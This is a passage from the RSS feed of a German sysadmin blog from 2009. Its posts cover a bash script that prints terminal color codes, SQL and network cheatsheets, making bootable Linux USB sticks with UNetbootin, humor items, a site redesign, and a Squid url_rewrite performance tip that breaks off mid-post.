		<feedburner:origLink>http://www.adminlife.net/buecher/praxisbuch-nagios/</feedburner:origLink></item>
		<item>
		<title>Farbtabelle für die Konsole</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/PmM-pG3RuIA/</link>
		<comments>http://www.adminlife.net/wissen/farbtabelle-fuer-die-konsole/#comments</comments>
		<pubDate>Sat, 21 Nov 2009 07:34:37 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[wissen]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<category><![CDATA[color]]></category>
		<category><![CDATA[colour]]></category>
		<category><![CDATA[echo]]></category>
		<category><![CDATA[farben]]></category>
		<category><![CDATA[farbig]]></category>
		<category><![CDATA[farbtabelle]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[skripts]]></category>
		<category><![CDATA[spickzettel]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2122</guid>
		<description><![CDATA[Wer ein bisschen Farbe in sein Shellscript bringen möchte, dem könnte folgender Codeschnippsel behilflich sein. Einfach in ein Terminal kopieren, schon erhält man eine komplette Farbtabelle mit entsprechenden Farbcodes: [code language="shell"] #/bin/sh # Show all the colors of the rainbow, should be run under bash for STYLE in 0 1 2 3 4 5 6 [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Wer ein bisschen Farbe in sein Shellscript bringen möchte, dem könnte folgender Codeschnippsel behilflich sein. Einfach in ein Terminal kopieren, schon erhält man eine komplette Farbtabelle mit entsprechenden Farbcodes:</p>
<p>[code language="shell"]<br />
#/bin/sh<br />
# Show all the colors of the rainbow, should be run under bash<br />
for STYLE in 0 1 2 3 4 5 6 7; do<br />
  for FG in 30 31 32 33 34 35 36 37; do<br />
    for BG in 40 41 42 43 44 45 46 47; do<br />
      CTRL=&quot;\033[${STYLE};${FG};${BG}m&quot;<br />
      echo -en &quot;${CTRL}&quot;<br />
      echo -n &quot;${STYLE};${FG};${BG}&quot;<br />
      echo -en &quot;\033[0m&quot;<br />
    done<br />
    echo<br />
  done<br />
  echo<br />
done<br />
# Reset<br />
echo -e &quot;\033[0m&quot;<br />
[/code]</p>
<p align="justify">Nutzen lässt sich z.B: die Farbe grün (Code 32) mit fetter Schrift (Code 1) wie folgt:</p>
<p>[code language="shell"]<br />
echo -e &quot;\e[1;32mGREEN\033[0m&quot;<br />
[/code]</p>
<p align="justify">Anschließend wird die Terminalfarbe mit der Code Kombination <code>\033[0m</code> wieder auf die Standardfarben resettet.</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/PmM-pG3RuIA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/wissen/farbtabelle-fuer-die-konsole/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/wissen/farbtabelle-fuer-die-konsole/</feedburner:origLink></item>
		<item>
		<title>SQL JOINS Cheatsheet</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/ydd2-7P2quQ/</link>
		<comments>http://www.adminlife.net/downloads/sql-joins-cheatsheet/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 05:33:57 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[downloads]]></category>
		<category><![CDATA[cheat]]></category>
		<category><![CDATA[cheatsheets]]></category>
		<category><![CDATA[help]]></category>
		<category><![CDATA[hilfe]]></category>
		<category><![CDATA[joins]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[sheet]]></category>
		<category><![CDATA[spicker]]></category>
		<category><![CDATA[spickzettel]]></category>
		<category><![CDATA[sql]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2116</guid>
		<description><![CDATA[via]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.adminlife.net/wp-content/uploads/2009/11/Visual_SQL_JOINS_orig.jpg" rel="lightbox[2116]" title="Visual_SQL_JOINS_orig"><img src="http://www.adminlife.net/wp-content/uploads/2009/11/Visual_SQL_JOINS_orig.png" alt="Visual_SQL_JOINS_orig" title="Visual_SQL_JOINS_orig" width="540" height="425" class="aligncenter size-full wp-image-2117" /></a></p>
<p><a href="http://www.codeproject.com/KB/database/Visual_SQL_Joins/Visual_SQL_JOINS_orig.jpg">via</a><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/ydd2-7P2quQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/downloads/sql-joins-cheatsheet/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/downloads/sql-joins-cheatsheet/</feedburner:origLink></item>
		<item>
		<title>Live USB-Stick aller Linux Distributionen</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/hJq7mSIGjGc/</link>
		<comments>http://www.adminlife.net/howtos/live-usb-stick-aller-linux-distributionen/#comments</comments>
		<pubDate>Sun, 01 Nov 2009 10:17:04 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[howtos]]></category>
		<category><![CDATA[boot]]></category>
		<category><![CDATA[bootfähig]]></category>
		<category><![CDATA[cd]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[live]]></category>
		<category><![CDATA[start]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[unetbootin]]></category>
		<category><![CDATA[usb]]></category>
		<category><![CDATA[usb device]]></category>
		<category><![CDATA[usb stick]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2106</guid>
		<description><![CDATA[Live CDs sind tod &#8211; es lebe der Live USB-Stick! Dank UNetbootin wird die Erstellung eines solchen bootfähigen USB-Sticks zum Kinderspiel. Alle bekannten Linux Distributionen, verschiedene BSD Derivate sowie spezielle Live CDs (z.B. Antivir- und Systemrettungsdisks) können mittels UNetbootin mit wenigen Klicks auf einen USB Stick gebracht werden. Nach der Auswahl der gewünschten Distribution und [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter size-full wp-image-2107" title="unetbootin" src="http://www.adminlife.net/wp-content/uploads/2009/10/unetbootin.png" alt="unetbootin" width="525" height="381" /></p>
<p align="justify">Live CDs sind tod &#8211; es lebe der Live USB-Stick! Dank <a href="http://unetbootin.sourceforge.net/">UNetbootin</a> wird die Erstellung eines solchen bootfähigen USB-Sticks zum Kinderspiel. Alle bekannten Linux Distributionen, verschiedene BSD Derivate sowie spezielle Live CDs (z.B. Antivir- und Systemrettungsdisks) können mittels UNetbootin mit wenigen Klicks auf einen USB Stick gebracht werden.</p>
<p align="justify">Nach der Auswahl der gewünschten Distribution und des zu nutzenden USB-Sticks lädt <a href="http://unetbootin.sourceforge.net/">UNetbootin</a> alle benötigten Dateien automatisch herunter und erstellt den bootfähigen USB-Stick. Auch eigene ISO-Dateien &#8211; z.B. von anderen Linux Distributionen &#8211; kann man auswählen und auf den Stick speichern. Möglich ist auch die Auswahl eines benutzerdefinierten Kernels.</p>
<p align="justify"><a href="http://unetbootin.sourceforge.net/">UNetbootin</a> ist bei den meisten Linux Distributionen bereits als Paket vorhanden. Auch für Windows ist das Programm verfügbar. </p>
<p>Weitere Informationen zu Linux auf dem USB-Stick:<br />
<a href="http://www.pendrivelinux.com/">Pendrivelinux.com</a><br />
<a href="http://wiki.ubuntuusers.de/Live-USB">Live USB Stick mit Ubuntu Boardmitteln</a><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/hJq7mSIGjGc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/howtos/live-usb-stick-aller-linux-distributionen/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/howtos/live-usb-stick-aller-linux-distributionen/</feedburner:origLink></item>
		<item>
		<title>Bootzeit: Ubuntu Karmic vs. Windows 7</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/zUEx6CqaHgA/</link>
		<comments>http://www.adminlife.net/netzwelt/bootzeit-ubuntu-karmic-vs-windows-7/#comments</comments>
		<pubDate>Fri, 30 Oct 2009 15:18:59 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[netzwelt]]></category>
		<category><![CDATA[alpha]]></category>
		<category><![CDATA[benchmark]]></category>
		<category><![CDATA[boot]]></category>
		<category><![CDATA[bootzeit]]></category>
		<category><![CDATA[karmic]]></category>
		<category><![CDATA[rc]]></category>
		<category><![CDATA[start]]></category>
		<category><![CDATA[startvorgang]]></category>
		<category><![CDATA[startzeit]]></category>
		<category><![CDATA[time]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[upstart]]></category>
		<category><![CDATA[versus]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[vs]]></category>
		<category><![CDATA[windows 7]]></category>
		<category><![CDATA[youtube]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2095</guid>
		<description><![CDATA[[youtube width="560" height="340"]http://www.youtube.com/watch?v=ymbB8RT6Aas[/youtube] Das Video ist schon ein paar Tage älter und vergleicht eine Ubuntu Karmic Alpha Version sowie den Release Candidate von Windows 7. Kein echter Benchmark, aber ein interessanter Vergleich.]]></description>
			<content:encoded><![CDATA[<p>[youtube width="560" height="340"]http://www.youtube.com/watch?v=ymbB8RT6Aas[/youtube]</p>
<p align="justify">Das Video ist schon ein paar Tage älter und vergleicht eine Ubuntu Karmic Alpha Version sowie den Release Candidate von Windows 7. Kein echter Benchmark, aber ein interessanter Vergleich.</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/zUEx6CqaHgA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/netzwelt/bootzeit-ubuntu-karmic-vs-windows-7/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/netzwelt/bootzeit-ubuntu-karmic-vs-windows-7/</feedburner:origLink></item>
		<item>
		<title>CAUTION: This machine has no brain</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/mRbOn9wpW5w/</link>
		<comments>http://www.adminlife.net/dau/caution-this-machine-has-no-brain/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 16:25:00 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[dau]]></category>
		<category><![CDATA[aufkleber]]></category>
		<category><![CDATA[brain]]></category>
		<category><![CDATA[caution]]></category>
		<category><![CDATA[gehirn]]></category>
		<category><![CDATA[sticker]]></category>
		<category><![CDATA[workstation]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2082</guid>
		<description><![CDATA[Der Hinweis wäre auch an so mancher Workstation sicherlich nicht fehl am Platze.]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/10/caution_this_machine_has_no_brain.jpg" alt="caution_this_machine_has_no_brain" title="caution_this_machine_has_no_brain" width="540" height="264" class="aligncenter size-full wp-image-2083" /></p>
<p align="justify">Der Hinweis wäre auch an so mancher Workstation sicherlich nicht fehl am Platze.</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/mRbOn9wpW5w" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/dau/caution-this-machine-has-no-brain/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/dau/caution-this-machine-has-no-brain/</feedburner:origLink></item>
		<item>
		<title>Internet Report 1981</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/nL8eyi0Dw7k/</link>
		<comments>http://www.adminlife.net/wissen/internet-report-1981/#comments</comments>
		<pubDate>Tue, 27 Oct 2009 05:21:01 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[wissen]]></category>
		<category><![CDATA[1981]]></category>
		<category><![CDATA[dokumentation]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[nachrichten]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[newspaper]]></category>
		<category><![CDATA[report]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[youtube]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2079</guid>
		<description><![CDATA[[youtube]http://www.youtube.com/watch?v=5WCTn4FljUQ[/youtube] Nachrichten lesen am heimischen Computer &#8211; damals noch keine große Konkurrenz für die Zeitungsverlage&#8230;]]></description>
			<content:encoded><![CDATA[<p>[youtube]http://www.youtube.com/watch?v=5WCTn4FljUQ[/youtube]</p>
<p align="justify">Nachrichten lesen am heimischen Computer &#8211; damals noch keine große Konkurrenz für die Zeitungsverlage&#8230;</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/nL8eyi0Dw7k" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/wissen/internet-report-1981/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/wissen/internet-report-1981/</feedburner:origLink></item>
		<item>
		<title>The coolest IP on the Internet</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/1fUZvJg9Tdk/</link>
		<comments>http://www.adminlife.net/geek/the-coolest-ip-on-the-internet/#comments</comments>
		<pubDate>Mon, 26 Oct 2009 16:18:04 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[geek]]></category>
		<category><![CDATA[69.69.69.69]]></category>
		<category><![CDATA[cool]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[host]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[reverse]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2074</guid>
		<description><![CDATA[[code language="css"] # host 69.69.69.69 69.69.69.69.in-addr.arpa domain name pointer the-coolest-ip-on-the-net.com. [/code] Noch Fragen?]]></description>
			<content:encoded><![CDATA[<p>[code language="css"]<br />
# host 69.69.69.69<br />
69.69.69.69.in-addr.arpa domain name pointer the-coolest-ip-on-the-net.com.<br />
[/code]</p>
<p align="justify">Noch Fragen? <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/1fUZvJg9Tdk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/geek/the-coolest-ip-on-the-internet/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/geek/the-coolest-ip-on-the-internet/</feedburner:origLink></item>
		<item>
		<title>Netzwerk Spickzettel</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/8XgevkoNOMs/</link>
		<comments>http://www.adminlife.net/downloads/netzwerk-spickzettel/#comments</comments>
		<pubDate>Sun, 25 Oct 2009 14:43:50 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[downloads]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[ipsec]]></category>
		<category><![CDATA[ipv4]]></category>
		<category><![CDATA[ipv6]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[netzwerk]]></category>
		<category><![CDATA[pdf]]></category>
		<category><![CDATA[ppp]]></category>
		<category><![CDATA[spicker]]></category>
		<category><![CDATA[spickzettel]]></category>
		<category><![CDATA[tcpdump]]></category>
		<category><![CDATA[vlan]]></category>
		<category><![CDATA[wireshark]]></category>
		<category><![CDATA[wlan]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2087</guid>
		<description><![CDATA[PacketLife.net hat einige nützliche Spickzettel rund ums Thema Netzwerk im Angebot. Neben IPv4 und IPv6 geht es u.a. um BGP, PPP, IPSec und WLAN. Zusätzlich gibt es eine Zusammenfassung über die wichtigsten Parameter zu tcpdump und Wireshark sowie eine Übersicht von Kabeltypen. Alle Cheatsheets sind kostenlos im PDF Format verfügbar. Network Cheatsheets @packetlife.net]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/10/ipv6_cheatsheet.png" alt="ipv6_cheatsheet" title="ipv6_cheatsheet" width="540" height="175" class="aligncenter size-full wp-image-2088" /></p>
<p align="justify"><a href="http://www.packetlife.net">PacketLife.net</a> hat einige nützliche <a href="http://packetlife.net/library/cheat-sheets/">Spickzettel rund ums Thema Netzwerk</a> im Angebot. Neben IPv4 und IPv6 geht es u.a. um BGP, PPP, IPSec und WLAN. Zusätzlich gibt es eine Zusammenfassung über die wichtigsten Parameter zu tcpdump und Wireshark sowie eine Übersicht von Kabeltypen. Alle Cheatsheets sind kostenlos im PDF Format verfügbar.</p>
<p><a href="http://packetlife.net/library/cheat-sheets/">Network Cheatsheets @packetlife.net</a><br />
<!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/8XgevkoNOMs" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/downloads/netzwerk-spickzettel/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/downloads/netzwerk-spickzettel/</feedburner:origLink></item>
		<item>
		<title>Letzter Tag: World Of Goo Schnäppchen</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/QwuN8zrBPUk/</link>
		<comments>http://www.adminlife.net/games/letzter-tag-world-of-goo-schnaeppchen/#comments</comments>
		<pubDate>Sun, 25 Oct 2009 05:00:37 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[games]]></category>
		<category><![CDATA[buy]]></category>
		<category><![CDATA[deb]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[downloads]]></category>
		<category><![CDATA[game]]></category>
		<category><![CDATA[goo]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[paket]]></category>
		<category><![CDATA[paypal]]></category>
		<category><![CDATA[schnäppchen]]></category>
		<category><![CDATA[spende]]></category>
		<category><![CDATA[spiel]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[world of goo]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2068</guid>
		<description><![CDATA[Heute ist der letzte Tag um World Of Goo für theoretisch 1 Cent statt 20 USD zu erwerben. 2D Boy &#8211; die Macher hinter diesem recht erfolgreichen Spiel &#8211; lassen euch den Preis bestimmen. Das Spiel gibt es neben Mac- und Windows- auch in einer Linuxversion. Sogar ein Debian Paket, z.B. für Ubuntu, ist vorhanden! [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/10/world_of_goo_sale.png" alt="world_of_goo_sale" title="world_of_goo_sale" width="523" height="293" class="aligncenter size-full wp-image-2069" /></p>
<p align="justify"><a href="http://2dboy.com/games.php">Heute ist der letzte Tag um World Of Goo für theoretisch 1 Cent statt 20 USD zu erwerben.</a> 2D Boy &#8211; die Macher hinter diesem recht erfolgreichen Spiel &#8211; lassen euch den Preis bestimmen. Das Spiel gibt es neben Mac- und Windows- auch in einer Linuxversion. Sogar ein Debian Paket, z.B. für Ubuntu, ist vorhanden! Ich kann das Spiel nur weiterempfehlen.</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/QwuN8zrBPUk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/games/letzter-tag-world-of-goo-schnaeppchen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/games/letzter-tag-world-of-goo-schnaeppchen/</feedburner:origLink></item>
		<item>
		<title>Captcha from hell</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/Q7l9v_2J61Q/</link>
		<comments>http://www.adminlife.net/dau/captcha-from-hell/#comments</comments>
		<pubDate>Sat, 24 Oct 2009 11:43:16 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[dau]]></category>
		<category><![CDATA[captcha]]></category>
		<category><![CDATA[hell]]></category>
		<category><![CDATA[omg]]></category>
		<category><![CDATA[unlösbar]]></category>
		<category><![CDATA[wtf]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2060</guid>
		<description><![CDATA[Klick aufs Bild für Vollansicht. Laut Anbieter &#8220;sehr intuitiv bedienbar&#8221;. via]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.adminlife.net/wp-content/uploads/2009/10/captcha_from_hell.png" rel="lightbox[2060]" title="captcha_from_hell"><img class="aligncenter size-full wp-image-2063" title="captcha_from_hell" src="http://www.adminlife.net/wp-content/uploads/2009/10/captcha_from_hell_small.jpg" alt="captcha_from_hell" width="540" height="161" /></a></p>
<p align="justify">Klick aufs Bild für Vollansicht. Laut Anbieter &#8220;sehr intuitiv bedienbar&#8221;.</p>
<p><a href="http://blog.sim4000.de/massive_captcha_reloaded/entry/167/">via</a><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/Q7l9v_2J61Q" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/dau/captcha-from-hell/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/dau/captcha-from-hell/</feedburner:origLink></item>
		<item>
		<title>Die letzten Worte eines Sysadmins</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/zhOptmn6iT4/</link>
		<comments>http://www.adminlife.net/humor/die-letzten-worte-eines-sysadmins/#comments</comments>
		<pubDate>Sat, 24 Oct 2009 05:47:17 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[humor]]></category>
		<category><![CDATA[famous]]></category>
		<category><![CDATA[last]]></category>
		<category><![CDATA[letzten]]></category>
		<category><![CDATA[sysadmin]]></category>
		<category><![CDATA[words]]></category>
		<category><![CDATA[worte]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2056</guid>
		<description><![CDATA[Wir machen das Backup morgen! Stolper nicht über das Kabel! Warum braucht dieses Kommando so lange? Ich denke, ich habe es! Kein Problem! Dieser Server ist redundant! Ooops!]]></description>
			<content:encoded><![CDATA[<ul>
<li>Wir machen das Backup morgen!</li>
<li>Stolper nicht über das Kabel!</li>
<li>Warum braucht dieses Kommando so lange?</li>
<li>Ich denke, ich habe es!</li>
<li>Kein Problem! Dieser Server ist redundant!</li>
<li>Ooops!</li>
</ul>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/zhOptmn6iT4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/humor/die-letzten-worte-eines-sysadmins/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/humor/die-letzten-worte-eines-sysadmins/</feedburner:origLink></item>
		<item>
		<title>Linus Torvalds: “Daumen hoch für Windows 7″</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/xVep1xJLD7Y/</link>
		<comments>http://www.adminlife.net/humor/linus-torvalds-daumen-hoch-fuer-windows-7/#comments</comments>
		<pubDate>Fri, 23 Oct 2009 12:46:01 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[humor]]></category>
		<category><![CDATA[daumen hoch]]></category>
		<category><![CDATA[foto]]></category>
		<category><![CDATA[japan]]></category>
		<category><![CDATA[linus]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[photo]]></category>
		<category><![CDATA[promotion]]></category>
		<category><![CDATA[thumbs up]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2021</guid>
		<description><![CDATA[Keine Sorge &#8211; Linus hat kein Windows 7 gekauft. Das Foto entstand auf einer Linux Veranstaltung in Japan, bei der Microsoft direkt neben dieser Veranstaltung eine Windows 7 Promotion gestartet hat. via]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/10/linus-torvalds-gives-windows-7-a-big-thumbs-up1.jpg" alt="linus-torvalds-gives-windows-7-a-big-thumbs-up" title="linus-torvalds-gives-windows-7-a-big-thumbs-up" width="540" height="360" class="aligncenter size-full wp-image-2023" /></p>
<p align="justify">Keine Sorge &#8211; Linus hat kein Windows 7 gekauft. Das Foto entstand auf einer <a href="http://picasaweb.google.com/cschlaeger/JapanLinuxSymposium#5395400000458161906">Linux Veranstaltung in Japan</a>, bei der Microsoft direkt neben dieser Veranstaltung eine Windows 7 Promotion gestartet hat.</p>
<p><a href="http://www.engadget.com/2009/10/23/linus-torvalds-gives-windows-7-a-big-thumbs-up/">via</a><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/xVep1xJLD7Y" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/humor/linus-torvalds-daumen-hoch-fuer-windows-7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/humor/linus-torvalds-daumen-hoch-fuer-windows-7/</feedburner:origLink></item>
		<item>
		<title>Neues Design – neuer Hoster</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/eQJD9CxzzBQ/</link>
		<comments>http://www.adminlife.net/blog/neues-design-neuer-hoster/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 18:34:04 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[design]]></category>
		<category><![CDATA[hoster]]></category>
		<category><![CDATA[neu]]></category>
		<category><![CDATA[new]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[redesign]]></category>
		<category><![CDATA[vanager]]></category>
		<category><![CDATA[vps]]></category>
		<category><![CDATA[vserver]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1993</guid>
		<description><![CDATA[Anfang diesen Jahres habe ich es mir vorgenommen, nun endlich habe ich es auch umgesetzt. Das alte adminlife.net Design ist gegen ein neues ersetzt worden und viele Kleinigkeiten sind neu oder verändert. Zusätzlich habe ich den Hoster gewechselt und bin nun mit einem VPS bei vanager. Doch dazu zu späterer Zeit in einem separatem Beitrag [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Anfang diesen Jahres habe ich es mir vorgenommen, nun endlich habe ich es auch umgesetzt. Das alte <a href="http://www.adminlife.net">adminlife.net</a> Design ist gegen ein neues ersetzt worden und viele Kleinigkeiten sind neu oder verändert. Zusätzlich habe ich den Hoster gewechselt und bin nun mit einem VPS bei <a href="http://www.vanager.com/">vanager</a>. Doch dazu zu späterer Zeit in einem separatem Beitrag mehr.</p>
<p align="justify">Ich hoffe das neue Design trifft auf Zustimmung. Auf euer positives oder negatives Feedback bin ich gespannt &#8211; ebenso helfen mir von euch gefundene Fehler weiter. Also: Her damit! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/eQJD9CxzzBQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/blog/neues-design-neuer-hoster/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/blog/neues-design-neuer-hoster/</feedburner:origLink></item>
		<item>
		<title>Squid url_rewrite Performance</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/FH2Vh2FQFB8/</link>
		<comments>http://www.adminlife.net/tests/squid-url_rewrite-performance/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 21:20:13 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[tests]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[squid]]></category>
		<category><![CDATA[url_rewrite]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1753</guid>
		<description><![CDATA[Hier ein Tipp für Sysadmins, die url_rewrite in Squid nutzen: schaut euch genau an, wie performant eure Scripte sind und benchmarkt diese unbedingt! Ich hatte die Tage ein Problem mit einem Squid, der ungewöhnlich hohe Load verursachte &#8211; es lag an ineffizienter Programmierung des Rewriters. Für eine Hand voll URLs sollte er Umleitungen vornehmen, etwa [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1968" title="squid" src="http://www.adminlife.net/wp-content/uploads/2009/09/squid.png" alt="squid" width="120" height="56" /></p>
<p align="justify">Hier ein Tipp für Sysadmins, die url_rewrite in Squid nutzen: schaut euch genau an, wie performant eure Scripte sind und benchmarkt diese unbedingt!</p>
<p align="justify">
<p align="justify">Ich hatte die Tage ein Problem mit einem Squid, der ungewöhnlich hohe Load verursachte &#8211;  es lag an ineffizienter Programmierung des Rewriters. Für eine Hand voll URLs sollte er Umleitungen vornehmen, etwa von <code>^http://domain/formular</code> auf <code>https://domain/formular</code>.</p>
<p align="justify">Das ursprüngliche Script war in BASH programmiert &#8211; es verwendete externe Programme wie grep, sed &#8211; und war für geringe Bandbreiten (5MBit/s) performant genug. Die Bandbreite stieg jedoch bald auf  20MBit/s, was die Last schon sehr deutlich erhöhte, und  es werden voraussichtlich bald ~200MBit/s sein.</p>
<p align="justify">Das Script wurde daraufhin in Perl reimplementiert und läuft laut Benchmark um den Faktor 180 (!) schneller. Als Benchmark empfiehlt sich:</p>
